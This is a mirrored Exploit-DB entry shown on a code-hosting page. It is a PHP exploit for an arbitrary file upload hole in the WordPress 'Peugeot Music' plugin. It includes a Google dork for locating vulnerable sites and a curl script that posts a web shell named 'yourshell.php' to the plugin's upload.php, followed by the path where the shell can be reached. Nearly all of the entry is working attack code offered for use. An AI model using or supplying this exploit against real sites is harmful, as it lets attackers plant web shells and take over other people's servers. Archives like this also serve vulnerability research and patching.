bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/44737.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

44 lines
No EOL
1.3 KiB
Text
Raw Blame History

# Exploit Title: Wordpress Plugin Peugeot Music - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/peugeot-music-plugin/
# Date: 2018-05-23
# Exploit Author: Mr.7z
# Vendor Homepage: -
# Software Link: -
# Version: 1.0
# Tested on: Windows 10 64bit (Home Edition)
# Exploit: /wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php
# Vuln? {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
# CSRF
<?php
$url = "http://target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php";
// put URL Here
$post = array
(
"file" => "@yourshell.jpg",
"name" => "yourshell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1;
rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
# For CSRF using php xampp.
# Shell Locate:
target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/uploads/yourshell.php
# Thanks To XaiSyndicate - Family Attack Cyber - HunterSec-Team -
# Typical Idiot Security [!]
Reference in a new issue View git blame Copy permalink